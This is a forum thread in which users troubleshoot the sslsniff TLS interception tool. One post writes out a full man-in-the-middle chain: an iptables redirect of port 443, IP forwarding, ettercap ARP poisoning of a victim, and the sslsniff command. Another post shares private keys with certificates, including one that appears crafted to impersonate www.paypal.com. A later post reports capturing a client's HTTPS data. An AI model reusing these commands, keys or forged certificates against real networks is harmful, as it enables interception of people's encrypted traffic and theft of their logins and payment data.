Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: sslsniff 0.6

  1. #1
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default sslsniff 0.6

    For several days I am trying to install - use correctly sslsniff v0.6. The best results that i get was from ntua.gr. Maybe isn't the right way but it's a way.

    sslsniff v0.6 (with a small man page)
    ftp.ntua.gr:/debian/pool/main/s/sslsniff/

    And here are dependencies:

    1)http://ftp.ntua.gr/debian/pool/main/b/boost1.40/
    libboost-filesystem1.40.0
    libboost-system1.40.0
    libboost-thread1.40.0

    2)ftp.ntua.gr:/debian/pool/main/l/log4cpp/
    liblog4cpp5

    At sslsniff's home page says that is needed the following packages:
    openssl libboost1.35-dev libboost-filesystem1.35-dev libboost-thread1.35-dev liblog4cpp5-dev
    When I was installing boost1.35 from backtrack repository and then compile and run sslsniff, I am always getting a asio.hpp read 2 error ,or something like that. As far as I understand asio.hpp is a library from boost. With boost1.40 and sslsniff from ntua.gr installed this problem is fixed, but others come out. I can run sslsniff (short off) only in authority mode. Not 100% successfully since I am using wrong certificates and not a vulnerable browsers. (I realize that today). And as far as I know there is no boost1.40 package for ubuntu.Only for debian.

    Anyway. It will be very nice if we could use sslsniff in backtrack4.

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    32

    Default

    Here is a quick guide to recompiling and installing .deb packages from non-BT distros: Simple Source Builds

    The guide should be added to the official wiki when it comes back up.

  3. #3
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Thank you for your reply.

    Maybe this is off topic, but you may found it also useful, since you are missing how to add pgp keys.

    Coming Soon: An sane way of adding the gpg key for the Debian Sid repository
    Virchanza's how to:
    http://forums.remote-exploit.org/bac...ads-times.html

    Maybe prowl3r's script (for Ubuntu) help you finish your paper.

    Nick

  4. #4
    Junior Member
    Join Date
    Oct 2008
    Posts
    32

    Default

    Thanks for the link. I will look in to it, however, a tool is already provided for this (no script required). Its called `apt-key`. I just need to get around to learning how to use it .

  5. #5
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    2

    Default sslsniff-0.6 errors

    Hi Nick,
    I was hoping you could post your results here...have you in the meantime found any 100% solution to this problem?

    I'm having a similar one:
    a)download sslsniff-0.6
    b)install dependencies: openssl, libboost1.35-dev, libboost-filesystem1.35-dev, libboost-thread1.35-dev, liblog4cpp5-dev

    1)setting up iptables:
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    2)ip_forwarding mode setup:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    3)run mitm:
    ettercap -i eth0 -Tq -o -M arp:remote /"VICTIM IP ADDRESS"/ //
    note: victim = my computer, on my local lan
    4)run sslsniff:
    ./sslsniff -t -s 10000 -w sslsniff.log -m IPSCACLASEA1.crt -c ./certs/

    everything works fine until now. if I try to https with the victim computer, following is logged in sslsniff.log:
    1256822722 DEBUG sslsniff : Read error: asio.misc:2

    I would most deeply appreciate any help...thanks in advance guys!

  6. #6
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default Please give us some attention

    Quote Originally Posted by palko View Post
    Hi Nick,
    I was hoping you could post your results here...have you in the meantime found any 100% solution to this problem?
    Well, I glad that I am not the only one that suffering.

    No, palko. No progress here. Tried almost everything that my mind can think. Tried Debian packages ,compiled my self Boost, authority mode, targeted mode, IE 6, IE 7...Nothing.

    Yesterday I send a e-mail to the author of sslsniff about this. I am waiting for a response, but to be honest I am not expecting one. I am not a security analyst and my English are terrible.

    Maybe it could be a good idea to send you OR THE AUTHORS OF BT4 also a e-mail to found out what or how or if can we make sslsniff to work

    Come on guys (authors) don't let us suffering. We are two now. Me and palko.

    Nick

    BTW Welcome to the forums, palko

  7. #7
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    2

    Default sslsniff not working

    Seems to me like the same problem:

    Tried boost1.35, boost1.37, and, too, even compiling the boost1.40 myself, but still no prevail (Honestly I don't know if it's a boost problem, I was just assuming this based on your post, but reading the log it seems just logical.)

    Tried BT 8.10, tried it on Ubuntu9.04....I'm a noob, don't no if it made any sense to try with 9.04, tried anyway.

    If anybody was able to succesfully run sslsniff, it would be helpful to post his configuration here, please.

    @nick: don't know if trying various browser could affect this, since, at least in my case, sslsniff does not intersect the communication, just redirects it further (like a proxy, not changing the traffic, not providing fake certs, no mitm ... ). I'll keep you updated if I find something out!

    see you!

  8. #8
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    GIAC Certified Incident Handler
    Practical Assignment v3

    SSLSniff and IE’s Certification Chain Validation Vulnerability:

    Decomposing an Insider Threat to a Sensitive Web Application
    Download:
    http://www.chipchilders.com/pubs/Chip_Childers_GCIH.pdf

  9. #9
    Just burned his ISO
    Join Date
    May 2009
    Posts
    11

    Default ok i have done a lot of experimenting with it

    ok i have done a lot of experimenting with it. Sslsniff doesn't work for me.
    I have contacted with the author but he was not a lot helpful.
    So here are some replies from him (after i donated 5 e). ..
    These may come helpful....

    > How is the targeted mode and the authority mode used for sslsniff
    > ?
    Code:
    Authority mode will create a cert for the domain clients are trying to
    connect to on the fly and sign it with whatever certificate you specify
    with -c.  So the certificate you specify needs to have basicConstraints:
    CA set to TRUE and it needs to be trusted by the client's browser as a
    signing certificate.
    > what ceerts should i have in my certs folder?
    Code:
    If you are running in targeted mode, you need to have a valid leaf-node
    certificate in your "certs" directory for whatever domain the client is
    trying to connect to.  If you're trying to intercept traffic to
    google, this means you need a cert with google in the
    CN, which is signed by a CA-cert.
    And two Certs for you guys
    1. trusted -the one that is in the doc that nick linked - For your appetites

    Code:
    -----BEGIN RSA PRIVATE KEY-----
    MIIBPAIBAAJBANQa59zwIP1zNP8Bn4NATYZ
    eUXcn+ZtzkBIabVTjRxDuuCM5Yzhs
    ylMocJlDElLvnyexjc1RsVNAOKfSUgjVNo0
    CAwEAAQJBAMJ0+GYCcPxshwXTwx5d
    8bVi+2U27Qyr4kX2nI3a4OiPhzhdpbF70c4
    urpkxg2tndtOLt8fzv1T8wJ0StlVQ
    wgECIQD6bvblXlxp+CfeSnnCpX5nAhVmkPQ
    8vpRkWATeG5BOLQIhANjR16Q4CBRe
    v+QHTvD3eyD0tAzWgJEOX5/HLFmHBCXhAiE
    Aod9BtUaF43Ukh/mJtHf2OSzOmmpN
    hEoHbsi59LrKTs0CIQCvB08GMXlMQGS1xrS
    ST6YlJ4VFq89jye+lwxppN1ZA4QIg
    DWIN1IWhCdb+w8jyPWnHr9Cj63RKcXWl6Ve
    AYyPsofI=
    -----END RSA PRIVATE KEY-----
    -----BEGIN CERTIFICATE-----
    MIIDgzCCAmugAwIBAgIEAIWWajANBgkqhki
    G9w0BAQQFADCBozELMAkGA1UEBhMC
    VVMxCzAJBgNVBAgTAlVUMRcwFQYDVQQHEw5
    TYWx0IExha2UgQ2l0eTEeMBwGA1UE
    ChMVVGhlIFVTRVJUUlVTVCBOZXR3b3JrMSE
    wHwYDVQQLExhodHRwOi8vd3d3LnVz
    ZXJ0cnVzdC5jb20xKzApBgNVBAMTIlVUTi1
    VU0VSRmlyc3QtTmV0d29yayBBcHBs
    aWNhdGlvbnMwHhcNMDIwODE3MTgxNzQ1Whc
    NMDIxMTE2MTkxNzQ1WjCB4jELMAkG
    A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd
    0b24xEDAOBgNVBAcTB1JlZG1vbmQx
    ITAfBgNVBAoTGHRydXN0ZWRjb21wdXRpbmc
    uY2piLm5ldDEmMCQGA1UECxMdU2Vl
    IHd3dy5mcmVlc3NsLmNvbS9jcHMgKGMpMDI
    xPjA8BgNVBAsTNURvbWFpbiBDb250
    cm9sIFZhbGlkYXRlZCAtIE9yZ2FuaXphdGl
    vbiBOb3QgVmFsaWRhdGVkMSEwHwYD
    VQQDExh0cnVzdGVkY29tcHV0aW5nLmNqYi5
    uZXQwXDANBgkqhkiG9w0BAQEFAANL
    ADBIAkEA1Brn3PAg/XM0/wGfg0BNhl5Rdyf
    5m3OQEhptVONHEO64IzljOGzKUyhw
    mUMSUu+fJ7GNzVGxU0A4p9JSCNU2jQIDAQA
    Bo0YwRDARBglghkgBhvhCAQEEBAMC
    BkAwDgYDVR0PAQH/BAQDAgTwMB8GA1UdIwQ
    YMBaAFPqGydvguul49Uuo1hXf8NPh
    ahQ8MA0GCSqGSIb3DQEBBAUAA4IBAQBrtjT
    nC2F8yrkVzgyWX/FYjWmoLrcGFYBA
    RXTSlHV5z5sqqAZxM47b7NK4PL/2XXFK2Sj
    p+I5ZpSSGLY4Fkh1gj5kL3O+G6FO+
    eIZ7FjrCPtR40HZjACGVu18FGxxixFsk9ps
    lQr1ymFruHIziiQrWFFfoIruWoxDR
    dq6VeAC01TiTkb7I6ei+u2tAXqztk7UNX4U
    ql//daf5QovfwdIlD+CYdjFryUTKG
    oBLBEa7A3sCbAhotDyFRYObyvcKs8GbxkPI
    tDcGKY8LzwrrbTTs7PMe9Qyb6Wk+U
    Lx7R2ejm2w9ha1DgR+0qTEK0orYHpG+90EG
    HVdfJPr5h04IcPuwk
    -----END CERTIFICATE-----
    2. Paypal
    Code:
    -----BEGIN CERTIFICATE----- 
    MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC 
    RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD 
    VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl 
    Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl 
    aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl 
    aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3 
    DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0 
    MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU 
    BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL 
    EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy 
    ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86 
    ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV 
    QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc 
    L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHR 
    MEAjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI 
    KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY 
    MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER 
    Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ 
    bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp 
    Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC 
    AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4 
    QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy 
    Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv 
    bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH 
    BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF 
    QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p 
    cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo 
    dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j 
    cmwwPaA7oDmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz 
    Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo 
    dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv 
    FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4 
    QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc 
    eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7 
    -----END CERTIFICATE----- 
    
    -----BEGIN RSA PRIVATE KEY----- 
    MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9 
    mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP 
    c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB 
    AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1 
    /6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr 
    h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho 
    J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6 
    4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L 
    MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA 
    qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0 
    j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW 
    dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3 
    ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB 
    -----END RSA PRIVATE KEY-----
    Good Luck!!!

    Nick thanks

  10. #10
    Senior Member Nick_the_Greek's Avatar
    Join Date
    Jan 2010
    Location
    Greece
    Posts
    181

    Default

    Quote Originally Posted by Jimmy Kane View Post
    ok i have done a lot of experimenting with it. Sslsniff doesn't work for me.
    Jimmy Kane, I can proudly inform you that I got some (I say some) positive results with sslsniff. I can use it with an expired leaf certificate in authority mode only and my client is using IE6. The client complaining that the cert has expired but if I change the date to that date that the certificate was valid the the IE accepts the cert and I can capture data.

    Stay tuned. I will do some further testing and very soon I will post how to install-use sslsniff.

    Nick

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •